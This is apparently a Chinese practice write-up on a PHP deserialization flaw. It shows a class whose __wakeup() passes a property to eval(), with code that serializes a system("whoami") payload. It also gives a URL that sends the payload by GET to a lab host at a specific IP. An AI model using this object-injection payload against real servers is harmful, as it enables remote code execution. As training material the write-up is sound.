反序列化漏洞练习1

根据代码可以看出来sis类只是接收了参数cmd,下边是通过get获得cmd的值,所以可以在序列化过程中直接为cmd赋值。

根据源码编写序列化代码

php 复制代码
<?php
class sis{
    public $cmd='system("whoami");?>';
    public function __wakeup(){
        eval($this->cmd);
    }
}
$a = new sis;
echo serialize($a);
?>

为cmd赋值后,直接将整个sis类序列化

访问该代码

得到序列化的sis,将序列化后的sis以get的方式为cmd传参

124.221.58.83:81/s1.php?cmd=O:3:"sis":1:{s:3:"cmd";s:19:"system("whoami");?>";}

完成

相关推荐
tangjunjun-owen9 分钟前
[特殊字符] Python异步调用本地Ollama大模型实战:从Demo到高并发避坑指南
开发语言·chrome·python
RSTJ_162511 分钟前
PYTHON+AI LLM DAY FOURTY-THREE
开发语言·人工智能·python
Volunteer Technology12 分钟前
SpringAI(二)Models 模型介绍
开发语言·人工智能·python
ricardo197334 分钟前
手写一个虚拟列表,万级数据滚动 FPS 稳定 60 帧
前端
小KK_37 分钟前
新手必看:一篇文章带你搞懂JavaScript作用域
前端
万邦科技Lafite37 分钟前
如何通过 item_search_img API 接口获取淘宝商品信息
java·前端·数据库
Jx65740 分钟前
初学者视角下的JavaScript作用域理解
javascript
lly20240643 分钟前
《jEasyUI 取得选中行数据》
开发语言
AlbertZein1 小时前
干了三年全栈才悟到:TS + React 这套组合,真不是堆技术堆出来的
前端
化为五月1 小时前
我把 Hermes 接进了飞书,结果卡在“能发消息但就是不回”
前端